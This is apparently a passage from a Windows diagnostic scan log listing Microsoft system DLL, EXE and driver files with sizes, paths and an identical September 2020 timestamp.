2020-09-15 17:43 - 2020-09-15 17:43 - 001081856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Vpn.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001068112 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001056768 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001008640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001003320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\drvstore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000969216 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000943408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000920896 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000912896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000907440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000894768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000890944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000887304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000885760 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000882176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000881152 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000877056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000869376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\directml.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000857344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000856064 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000801544 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000797448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\propsys.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000794624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000782968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000775776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000763840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000761280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCPKsp.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000757192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000755576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000750976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FlightSettings.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000748360 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicensingWinRT.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000733184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BTAGService.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000721920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000721920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000711680 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000707584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000703488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsecedit.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000702792 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000702464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000697344 _____ (Microsoft Corporation) C:\WINDOWS\system32\vpnike.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000688960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000687616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000676680 _____ (Microsoft Corporation) C:\WINDOWS\system32\computecore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000670208 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000651776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000643584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000636928 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000634680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicensingWinRT.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000629760 _____ (Microsoft Corporation) C:\WINDOWS\system32\uxtheme.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000627712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000617472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000614912 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000611952 _____ C:\WINDOWS\SysWOW64\TextShaping.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000602184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryPS.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000588288 _____ (Microsoft Corporation) C:\WINDOWS\system32\WLanConn.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000585696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000583608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StateRepository.Core.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000581632 _____ (Microsoft Corporation) C:\WINDOWS\system32\scesrv.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000572928 _____ (Microsoft Corporation) C:\WINDOWS\system32\SppExtComObj.Exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000568120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000556544 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxdiagn.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000547328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000547328 _____ (Microsoft Corporation) C:\WINDOWS\system32\slui.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000546464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000540160 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000528352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResourceMapper.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000525312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000520192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Launcher.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000516096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UiaManager.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000512512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000512000 _____ (Microsoft Corporation) C:\WINDOWS\system32\defragsvc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000509440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000501248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000500968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase_enclave.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000495848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp_win.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000491008 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntshrui.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\upnphost.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000468992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000455680 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000454144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uxtheme.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000447488 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WLanConn.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000434176 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000430080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000420920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000417280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scesrv.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000412688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SgrmEnclave_secure.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000409088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Payments.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000402944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000388608 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000387072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShellCommonCommonProxyStub.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000382976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MicrosoftAccountWAMExtension.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000364544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanui.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntshrui.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000342016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FWPUCLNT.DLL
2020-09-15 17:43 - 2020-09-15 17:43 - 000340992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000337768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\prnntfy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000328704 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000316928 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcomapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000303288 _____ (Microsoft Corporation) C:\WINDOWS\system32\skci.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000303168 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000303104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnputil.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Lights.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000297984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000295424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlangpui.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000286720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000286024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000283648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcomapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000283648 _____ (Microsoft Corporation) C:\WINDOWS\system32\pdh.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000282624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000278016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\prnntfy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.FileExplorer.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000275456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovs.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppLockerCSP.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000266240 _____ C:\WINDOWS\SysWOW64\Windows.Internal.UI.Shell.WindowTabManager.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000265728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000259584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore6.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000253952 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerCsp.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlancfg.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000248320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Gpu.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialclient.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000244736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pdh.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000242688 _____ (Microsoft Corporation) C:\WINDOWS\system32\ssdpsrv.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000240136 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000236544 _____ (Microsoft Corporation) C:\WINDOWS\system32\IndexedDbLegacy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000235008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmWmiPl.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000233984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.FileExplorer.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000229376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchFilterHost.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryUpgrade.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000222720 _____ (Microsoft Corporation) C:\WINDOWS\system32\VideoHandlers.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000217920 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcbloader.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000213344 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000212760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EditionUpgradeManagerObj.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndiswan.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceSoftwareInstallationClient.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000196768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IPHLPAPI.DLL
2020-09-15 17:43 - 2020-09-15 17:43 - 000190792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxApplicabilityEngine.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000186880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallServiceTasks.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvcext.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000176440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000166272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\omadmapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000165376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000165376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EditionUpgradeHelper.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000163840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000161792 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000160768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BitLockerCsp.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000157184 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdWSD.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000153400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmAuto.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000141008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Clipc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000138936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000133736 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srpapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000125016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KerbClientShared.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000119608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadWamExtension.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000117056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000114176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssitlb.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdSSDP.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\agilevpn.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000110504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gpapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000110080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000109992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\profapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000109056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GraphicsCapture.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\raspptp.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000099640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryBroker.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlgpclnt.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000097280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Utilman.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlaapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000097080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oemlicense.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000096768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000095032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000092952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32u.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dtdump.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000091448 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceReactivation.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dot3msm.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dot3api.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rassstp.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000073728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcsvc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000070144 _____ (Microsoft Corporation) C:\WINDOWS\system32\udhisapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000069728 _____ (Microsoft Corporation) C:\WINDOWS\system32\iumcrypt.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000069432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceReactivation.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtutils.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ssdpapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000067072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EditBufferTestHook.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000066560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManMigrationPlugin.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\edpnotify.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmRes.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000061752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GameInput.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntlanman.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcsvc6.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssprxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000053760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtutils.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msscntrs.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000049152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edpnotify.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfctrs.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Profile.SystemId.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\enrollmentapi.dll
